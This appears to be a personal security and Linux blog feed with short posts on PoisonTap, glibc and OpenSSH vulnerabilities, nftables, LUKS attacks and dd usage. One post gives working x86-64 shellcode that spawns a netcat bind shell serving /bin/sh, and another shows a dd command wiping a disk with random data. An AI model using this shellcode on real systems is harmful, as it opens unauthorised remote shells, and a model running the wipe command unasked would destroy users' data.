Nov 16 17

Samy Kamkar released an amazing new tool suite for the Raspberry Pi Zero which siphons cookies, exposes the internal router and installs a persistent web-based backdoor on your locked computers.

Project site: https://samy.pl/poisontap/
Source code: https://github.com/samyk/poisontap

written by d45id

Jul 16 06
#include <stdio.h>
#include <string.h>

// Victim: netstat -an | grep LISTEN | grep tcp
// Attacker: nc <victim_IP> <port>

// Port as two ASCII digits (0x39 is '9')
// Keep to two bytes
#define PORT "\x39\x39"

unsigned char code[] =
"\x48\x31\xff\x48\xf7\xe7\x50\x48\xbf\x2f\x2f\x62\x69\x6e\x2f\x6e\x63\x57\x48\x89\xe7\x50\x48\xbb\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x53\x48\x89\xe3\x68\x2d\x6c\x76\x65\x48\x89\xe1\x68\x2d\x70" PORT "\x48\x89\xe6\x50\x53\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05";

int main(void)
{
    // I make sure there are no nulls
    // The string count will terminate at the first \x00
    printf("The Shellcode is %zu Bytes Long\n", strlen((char *)code));

    // Next I throw 0xAAAAAAAA into every register before shellcode execution
    // This ensures that the shellcode will run in any circumstance
    // Note: code[] lives in a writable data section; with NX enabled the
    // call below faults unless the build marks that section executable
    __asm__("mov $0xAAAAAAAAAAAAAAAA, %rax\n\t"
            "mov %rax, %rbx\n\t" "mov %rax, %rcx\n\t" "mov %rax, %rdx\n\t"
            "mov %rax, %rsi\n\t" "mov %rax, %rdi\n\t" "mov %rax, %rbp\n\t"
            "mov %rax, %r10\n\t" "mov %rax, %r11\n\t" "mov %rax, %r12\n\t"
            "mov %rax, %r13\n\t" "mov %rax, %r14\n\t" "mov %rax, %r15\n\t"
            "call code");
    return 0;
}

written by d45id

Feb 16 18

Oh no! Google engineers discovered a stack-based buffer overflow vulnerability in the getaddrinfo() library function of the DNS resolver shipped with glibc since version 2.9, which may allow a remote attacker to execute arbitrary code.

written by d45id

Jan 16 14

Today the OpenSSH project reported a bug in the client component of OpenSSH versions 5.4 up to 7.1.
The announced issue could allow an OpenSSH client to leak client memory, including (private) key information, to the connected SSH server. The vulnerability was discovered in the roaming feature of the OpenSSH client, which is enabled by default.

This vulnerability affects the OpenSSH client on most operating systems, such as Linux, FreeBSD and Mac OS X.

written by d45id

Aug 14 23

The latest on the Linux kernel from Linus Torvalds, Andrew Morton (Google), Shuah Khan (Samsung), Andy Lutomirski (AMA Capital Management) and Greg Kroah-Hartman (The Linux Foundation (Moderator)). From LinuxCon + CloudOpen North America 2014 in Chicago, IL.

written by d45id

Jan 14 20

The new kernel version 3.13 now ships with a new packet filter, nftables.
Nftables, developed by the Netfilter project, aims to replace the existing frameworks such as {ip,ip6,arp,eb}tables, which also originate from that project …

See also:

Talk about nftables at Kernel Recipes 2013
Nftables quick howto

written by d45id

Dec 13 23

Jakob Lell demonstrates in detail in his article "Practical malleability attack against CBC-Encrypted LUKS partitions" how an attack on Linux system encryption with Linux Unified Key Setup (LUKS) in Cipher Block Chaining (CBC) mode can be carried out.

written by d45id

Nov 13 02

Console 1:

root@nyx:/home/d45id# dd if=/dev/urandom of=/dev/sdb bs=4M

Console 2 (find the PID):

d45id@nyx:~$ ps -ef | grep -w '[d]d'
root      2851  2841 99 17:20 pts/1    00:00:14 dd if=/dev/urandom of=/dev/sdb bs=4M

Console 2 (send USR1):

root@nyx:/home/d45id# kill -USR1 2851
root@nyx:/home/d45id# kill -USR1 2851

Every time dd receives this signal, it prints on the first terminal a short statistic of the bytes sent and received up to that point:

109+0 Datensätze ein
108+0 Datensätze aus
452984832 Bytes (453 MB) kopiert, 51,2639 s, 8,8 MB/s
250+0 Datensätze ein
249+0 Datensätze aus
1044381696 Bytes (1,0 GB) kopiert, 117,451 s, 8,9 MB/s
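The same two-console procedure as a single script, added here as an example that is not part of the original post: it starts dd in the background, sends it SIGUSR1 a few times and counts the progress reports dd writes to stderr. It assumes GNU dd (coreutils) on Linux, where USR1 triggers the report (BSD and macOS dd use SIGINFO instead); since the default action of SIGUSR1 is to terminate the process, a signal that arrives before dd has installed its handler would kill it, which is why the script waits a second first.

```shell
#!/bin/sh
# Added example, not from the original post. Assumes GNU dd (coreutils),
# which prints its statistics to stderr when it receives SIGUSR1.

# dd_progress LOGFILE REPORTS INTERVAL [dd arguments...]
# Runs dd in the background, sends it SIGUSR1 REPORTS times, INTERVAL
# seconds apart, then terminates it. Prints the number of reports captured.
dd_progress() {
    log=$1; reports=$2; interval=$3
    shift 3
    : > "$log"
    # LC_ALL=C keeps the report in English ("... bytes ... copied ...")
    LC_ALL=C dd "$@" 2>"$log" &
    pid=$!
    # Default action of SIGUSR1 is termination: give dd time to install
    # its handler before the first signal arrives.
    sleep 1
    i=0
    while [ "$i" -lt "$reports" ]; do
        kill -s USR1 "$pid" 2>/dev/null || break   # dd already gone
        sleep "$interval"
        i=$((i + 1))
    done
    # TERM is not handled by dd, so it produces no extra report line.
    kill -s TERM "$pid" 2>/dev/null || true
    wait "$pid" 2>/dev/null || true
    count=$(grep -c 'bytes.*copied' "$log" || true)
    rm -f "$log"
    echo "$count"
}

# Stand-alone run: a dd that never finishes on its own, polled twice.
n=$(dd_progress "/tmp/dd_progress.$$" 2 1 if=/dev/zero of=/dev/null bs=1M)
echo "captured $n progress reports"
```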

written by d45id